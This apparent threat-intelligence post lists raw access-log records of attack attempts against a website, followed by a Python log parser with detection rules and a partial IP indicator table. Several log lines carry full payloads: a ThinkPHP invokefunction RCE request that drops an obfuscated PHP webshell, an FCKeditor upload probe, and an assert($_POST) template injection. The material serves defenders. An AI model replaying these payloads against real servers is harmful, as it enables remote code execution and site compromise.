Collection of malicious IPs recently accessing the website
Author: buxia
2020-01-14 10:35:12 · ThreatBook · 134
Tags: scanning, SQL injection, web application vulnerability exploitation

Malicious IPs that accessed the website over the last seven days, using a variety of attack methods. Each line below is one raw access-log record: timestamp, client IP, host (redacted as "IP-address"), request path, three counters, HTTP status, referer, another counter, User-Agent, a second quoted field, method, protocol and cache result.


20200114024756 180.160.94.189 IP-address /phpinfo.php 6390 1050 2 404 NULL 66 "python-requests/2.22.0" "(null)" GET HTTPS miss

20200114024900 180.160.94.48 IP-address /phpinfo.php 6390 1050 2 404 NULL 83 "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" "(null)" GET HTTPS miss

20200112145317 114.239.105.38 IP-address /?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 360 120 2 403 http://IP-address/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 57 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTP/1.1 hit

20200112080234 104.223.185.82 IP-address /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F 418 -1 -1 403 http://IP-address/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F 151 "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "(null)" POST HTTP/1.1 hit

20200111060704 222.94.163.75 IP-address /admins/diy.asp 521 120 2 301 NULL 41 "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1" "(null)" GET HTTP/1.1 miss

20200110135834 114.239.105.89 IP-address /?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 361 120 2 403 http://IP-address/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 64 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTP/1.1 hit

20200110012813 122.51.78.36 IP-address /?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> 361 4 2 403 http://IP-address/? 6 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTP/1.1 hit

20200109211837 122.51.141.108 IP-address /utility/convert/index.php?a=config&source=d7.2_x2.0 557 4 2 301 NULL 52 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "(null)" GET HTTP/1.1 miss

20200108203401 112.252.98.70 IP-address /Config_Shell.php 22528 122 26 404 http://IP-address//Config_Shell.php 198 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTPS miss

20200108172853 49.89.249.255 IP-address /type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss 217 120 2 400 http://IP-address/type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss 1 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTP/1.1 hit
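A defender looking at a log excerpt like the one above usually wants two things: a parser for this exact field layout, and a small set of rules that tags each request with the attack family it belongs to (phpinfo probe, ThinkPHP `invokefunction` RCE attempt, FCKeditor connector upload, PHP webshell injection, webshell-path scan, Discuz! convert-tool probe), then an aggregation per client IP so the noisy scanners stand out. The following Python script is an added example written for this page, not code from the post's author or from ThreatBook. The sample lines are constructed: they copy the layout of the records above with the same redacted "IP-address" host, the long payload bodies shortened, and one benign request added as a negative case; the rule names and the attribution of each path pattern to a product are the example's own labels.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample input in the same layout as the post's log excerpt.
# Payloads are truncated; 203.0.113.7 is a made-up benign visitor (TEST-NET-3).
SAMPLE_LOG = r"""
20200114024756 180.160.94.189 IP-address /phpinfo.php 6390 1050 2 404 NULL 66 "python-requests/2.22.0" "(null)" GET HTTPS miss
20200112145317 114.239.105.38 IP-address /?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents 360 120 2 403 http://IP-address/ 57 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTP/1.1 hit
20200112080234 104.223.185.82 IP-address /FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F 418 -1 -1 403 http://IP-address/ 151 "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "(null)" POST HTTP/1.1 hit
20200108172853 49.89.249.255 IP-address /type.php?template=tag_(){};@unlink(FILE);print_r(xbshell);assert($_POST[1]);{//../rss 217 120 2 400 http://IP-address/ 1 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTP/1.1 hit
20200108203401 112.252.98.70 IP-address /Config_Shell.php 22528 122 26 404 http://IP-address//Config_Shell.php 198 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" "(null)" GET HTTPS miss
20200109211837 122.51.141.108 IP-address /utility/convert/index.php?a=config&source=d7.2_x2.0 557 4 2 301 NULL 52 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "(null)" GET HTTP/1.1 miss
20200114120000 203.0.113.7 IP-address /index.html 1200 300 1 200 NULL 10 "Mozilla/5.0" "(null)" GET HTTPS hit
"""

# Field layout as seen in the post: timestamp, client IP, host, path, three
# counters, status, referer, one counter, quoted UA, quoted extra, method, proto, cache.
LINE_RE = re.compile(
    r'^(?P<ts>\d{14}) (?P<ip>\S+) (?P<host>\S+) (?P<path>\S+) '
    r'(?P<n1>-?\d+) (?P<n2>-?\d+) (?P<n3>-?\d+) (?P<status>\d{3}) (?P<referer>\S+) (?P<n4>-?\d+) '
    r'"(?P<ua>[^"]*)" "(?P<extra>[^"]*)" (?P<method>[A-Z]+) (?P<proto>\S+) (?P<cache>\S+)$'
)

# Detection rules evaluated on the lower-cased, URL-decoded path. Names are this
# example's own labels; product attributions follow the well-known path signatures.
RULES = [
    ("thinkphp_invokefunction_rce",
     lambda p: "invokefunction" in p and "call_user_func_array" in p),
    ("fckeditor_upload_probe",
     lambda p: "/fckeditor/" in p and "command=fileupload" in p),
    ("php_webshell_injection",
     lambda p: "assert($_post" in p or "xbshell" in p),
    ("webshell_path_scan",
     lambda p: p.startswith("/config_shell.php") or p.startswith("/admins/diy.asp")),
    ("phpinfo_probe",
     lambda p: p.startswith("/phpinfo.php")),
    ("discuz_convert_probe",
     lambda p: p.startswith("/utility/convert/index.php")),
]


def parse_line(line):
    """Split one record into named fields; return None when the layout does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Decode until stable (bounded) so double-encoded payloads are matched in clear text.
    decoded = rec["path"]
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    rec["decoded_path"] = decoded
    return rec


def classify(rec):
    """Return the rule names a parsed record matches (empty list means not flagged)."""
    p = rec["decoded_path"].lower()
    return [name for name, pred in RULES if pred(p)]


def analyse(log_text):
    """Map each client IP to the sorted rule names it triggered; unflagged IPs are omitted."""
    hits = defaultdict(set)
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than crash on a malformed record
        for name in classify(rec):
            hits[rec["ip"]].add(name)
    return {ip: sorted(names) for ip, names in hits.items()}


if __name__ == "__main__":
    for ip, names in sorted(analyse(SAMPLE_LOG).items()):
        print(f"{ip:16} {', '.join(names)}")
```

Note that the status column alone is a poor filter: the ThinkPHP and FCKeditor attempts were answered with 403, the webshell probes with 404 or 400, and a real compromise would show a 200; matching on the decoded request path is what identifies the attempt regardless of outcome. Unmatched lines are skipped rather than raising, so one malformed record in a large log does not stop the run.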


Threat indicators (IOC)

IP                Ports  Domains  Samples  Tags
104.223.185.82    0      0        0        3
112.252.98.70     0      0        0        4
114.239.105.38    1      1        0        4
114.239.105.89    0      0        0        4
122.51.78.36      0      0        0        3

(9 indicators in total; the first 5 are listed here.)